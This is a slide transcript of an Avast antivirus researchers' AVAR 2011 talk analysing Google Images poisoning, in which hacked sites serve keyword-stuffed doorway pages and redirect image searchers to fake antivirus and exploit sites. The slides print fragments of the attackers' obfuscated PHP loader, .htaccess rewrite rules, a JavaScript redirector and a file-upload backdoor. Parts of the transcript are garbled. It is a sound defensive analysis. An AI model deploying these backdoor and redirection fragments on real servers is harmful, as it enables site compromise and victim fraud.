• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Poisoning Google images
 

Poisoning Google images

on

  • 6,399 views

There have long been links on the internet that take the unwary user to a page with unexpected or malicious content. Most of these attempts rely on the user to click on the link to be successful. ...

There have long been links on the internet that take the unwary user to a page with unexpected or malicious content. Most of these attempts rely on the user to click on the link to be successful. However, the latest variation has moved beyond simple text links to "Google-image poisoning" - placing malware in the middle of Google searches for images where users have traditionally had no reason to be wary. Our presentation will focus on How malware writers are able to infect the average website; detailed analyses of the PHP script used to infect s ites and SEO techniques to get infected images at the top of search results.

Statistics

Views

Total Views
6,399
Views on SlideShare
6,388
Embed Views
11

Actions

Likes
2
Downloads
0
Comments
0

2 Embeds 11

http://paper.li 6
http://a0.twimg.com 5

Accessibility

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • predstaveni
  • Zminit: uspesnyatak (a proc), a jak “funguje” (obecne)
  • SEO – obrazkyjsou “dobrerankovane”
  • Jak to funguje a nakoho je to zamerenyZezacatku “nerozlisovali” OS ani browsers
  • Black SEO
  • Trust phenomenon
  • Rozdilnechovani -> predatslovo
  • Predrozebiranimchovanizminit JAK se nakazily “legitimate website”+ pridat “pribeh”
  • Main PHP script+ pribeh – povidani+funkeskriptujen “vyjmenovat” (nerozebirat)
  • Jake parametry a k cemujimslouzi

Poisoning Google images Poisoning Google images Presentation Transcript

  • Analysis of Google ImagesPoisoningLukáš HamíkJan Širmer www.avast.com
  • Agenda• What is Google-images poisoning?• How it works• Doorway generator• Java script redirector• Evolution• Data from AVAST CommunityIQ userbase• Summary• QuestionsAVAR 2011 www.avast.com
  • Google Images poisoning• SEO blackhat poisoning attack• Uses hacked sites to redirect users to sites containing fake AV or exploit• Uses key-word rich pages with hot-linked images for higher indexing by search bots• Images from hacked sites are near the top search results• Focused on users coming from well-know search enginesAVAR 2011 www.avast.com
  • Google Images poisoning User How it works? Infected serverAVAR 2011 www.avast.com
  • Google search resultsAVAR 2011 www.avast.com
  • Google Images poisoning User Infected server Fake AV Remote serverAVAR 2011 www.avast.com
  • Fake antivirusesAVAR 2011 www.avast.com
  • Google Images poisoning User Infected server Fake AV Remote server Bad guyAVAR 2011 www.avast.com
  • Why is it so successful?• Great SEO and nobody umed SEO for “imagem”AVAR 2011 www.avast.com
  • Why is it so successful? (2)• Computer users do not expect that they can get infected when searching for images on legitimate sites Infected Fake AV serverAVAR 2011 www.avast.com
  • Why is it so successful? (3)• Hide and Seek – if users are using Opera browser or they are coming from Google, Yahoo or a Bing, they are served a Java script redirector Malicious contentAVAR 2011 www.avast.com
  • Your website gets infected• The bad guys are using stolen FTP credentials• They upload PHP script to the WEB server• This is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to web server• Bonus feature - it lets the owners know that the page is readyAVAR 2011 www.avast.com
  • Additional malicious files• Xmlrpc.txt – Remote server address stored• -> Xml.txt -> Xml.cgi – address in Base64• Iog.txt – Redirecting java script stored• Shab100500.txt – Spam HTML template stored• -> Don.txt – HTML template in Base64AVAR 2011 www.avast.com
  • PHP script on infected sites• Earlier, they used names such as d{1,3}.php• Today, they use names like microphone.php, etc.• This script is responsible for: 1. Creating spam pages for Google bot indexing 2. Changing .htaccess 3. Serving redirect script to user to exploit sites 4. Serving redirect script to user to fake AV 5. Downloading malicious files to server 6. Telling owners that the site is readyAVAR 2011 www.avast.com
  • PHP scriptOriginal PHP file uploaded to server• <?eval (gzuncompress (base64_decode(eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I=) ) ); ?>AVAR 2011 www.avast.com
  • PHP scriptPHP file after first step of deobfuscation• $GLOBALS[_1600532410_]=Array(base64_dec ode(ZXJyb3Jfcm.Vwb3J0.aW5.n• Function _1070120820($i) {$a=Array(c.Q=.=,cQ==,• ($GLOBALS[_1600532410_][16]( _1070120820(6))) {…AVAR 2011 www.avast.com
  • PHP script after removingobfuscationif (strpos($_SERVER[HTTP_USER_AGENT], Opera) !== false) {}if (strpos($_SERVER[HTTP_REFERER], google.) || strpos($_SERVER[HTTP_REFERER], yahoo.) || strpos($_SERVER[HTTP_REFERER], bing.) > 0) {$_10 = file_get_contents(.log/ . $_4 . /xmlrpc.txt);AVAR 2011 www.avast.com
  • Doorway generator• HTML template is stored in the file .log/SITE/shab100500.txt• In the new version, shab100500.txt was replaced by don.txt <HTML> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in <Replaceme> </Replaceme> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco </HTML> www.avast.com
  • Doorway generator• Get descriptions of top 40 ‘mearch keywordm’ harmful action from Google web against a person or group in response• Shuffle the words into revenge to a their descriptions to get grievance, be it real unique text or rick santorum perceived www.avast.com
  • Doorway generator• Get top 20 ‘mearch <img keyword’ from Google src="http://SITE/p Images and extract links ath/hot-linked- to image files image.jpg"• Generates <img> tags alt="search and shuffle them keywords" align="random(cent er, right, left)"> www.avast.com
  • Doorway generator<img harmful action against aharmful actionsrc="http://SITE/p person or group in against a person orath/hot-linked- response revenge to a group in responseimage.jpg" grievance<img revenge to aalt="search src="http://SITE/path/hot- grievance, be it realkeywords" linked-image.jpg" or rick santorumalign="random(cent alt="search keywords" perceiveder, right, left)"> align="random(center, right , left)"> www.avast.com
  • Doorway generator<HTML>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt utlabore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamcolaboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in<h1>SEARCH KEYWORD</h1>Suggested links<Replaceme>Links to 30 most recently generated links</Replaceme>Rich-word generated text with hot-linked imagesLinks to alternative pagesLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt utlabore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco</HTML> www.avast.com
  • How do they make image URLsless suspicious?• "RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ ".$_SERVER[ SCRIPT_NAME."?q=$1 [L] “• this changes URL from suspicioushttp://SITE/wp-admin/BAD.php?q=search-keywords to http://SITE/wp-admin/search-keywordsAVAR 2011 www.avast.com
  • PHP script evolution• The first version was focused on all users using Opera browser or users coming from Google, Yahoo or Bing• During June, we found some changes in PHP code - Google is the only target - New redirection system• Request goes to a remote server ( mydiarycom.net ) - centralized• They have statistic data from parameters• No need to update iog.txt (redirecting script) or make differentiating changes on each serverAVAR 2011 www.avast.com
  • Data parametershttp://mydiarycom.net/out/stat.cgi?parameter=1. Name of the doorway site2. The full URL of doorway script3. Vimitor’m IP4. The referring URL5. The User-Agent of the umer’m browmer6. The search query used on GoogleAVAR 2011 www.avast.com
  • IP address and user-agents Fake AVAVAR 2011 www.avast.com
  • IP address and user-agents Spam pageAVAR 2011 www.avast.com
  • JavaScript redirectorvar URL = “SITE contains FakeAV” +encodeURIComponent(document.referrer) +"&parameter=$keyword&se=$se&ur=1&HTTP_REF ERER=“ +encodeURIComponent(document.URL) +"&default_keyword=default";if (window!=top) {top.location.href = URL;}else document.location= URL;AVAR 2011 www.avast.com
  • Redirection• Mac – http://IP/r/RANDOM_STRING IP and ‘r’ are change enery 30 minutem• Exploit site - http://SITE/index.php?tp=RANDOM_STRING Site and ‘tp’ are change enery 30 minutem• Fake AV – http://SITE/fast-scan/AVAR 2011 www.avast.com
  • Other changes• Rotating user-agent string• Password-protected maintenance request Someone who know how this algorithm works can easily change it and redirect to his or her own site• Xml.txt was replaced by xml.cgi• Working with free blogs sitesAVAR 2011 www.avast.com
  • Password-protected maintenancerequestif ($_GET[ dom100500 != { $_13 = fopen( .log/$_4. /xmlrpc.txt w+; fwrite($_13,$_GET[ dom100500); fclose($_13);if ($_GET[ up100500 != { $_14 = $_14 = $_14 . basename( $_FILES[ uploaded[ name) ; $_15=round(0+0.5+0.5); if(move_uploaded_file($_FILES[ uploaded[ tmp_name, $_14))AVAR 2011 www.avast.com
  • Data from theAVAST CommunityIQ• From March to August 2011, we discovered 22,580 unique infected sites• 5,698 sites are still infected• Typo : <IMG HEIGTH=?1?WIDTHAVAR 2011 www.avast.com
  • Infected domainsAVAR 2011 www.avast.com
  • Number of infected domainsAVAR 2011 www.avast.com
  • Summary• Google-image poisoning is an easy way how to spread fake AV and exploits• It’m bamed on mtolen FTP credentialm of webmamterm and great backdoor algorithms• The number of infected legitimate domains is growing every day• Common sense is not sufficient protectionAVAR 2011 www.avast.com
  • Questions and AnswersAVAR 2011 www.avast.com
  • Thank youJan Sirmer (sirmer@avast.com)Senior Virus AnalystLukas Hasik (hasik@avast.com)QA DirectorAVAR 2011 www.avast.com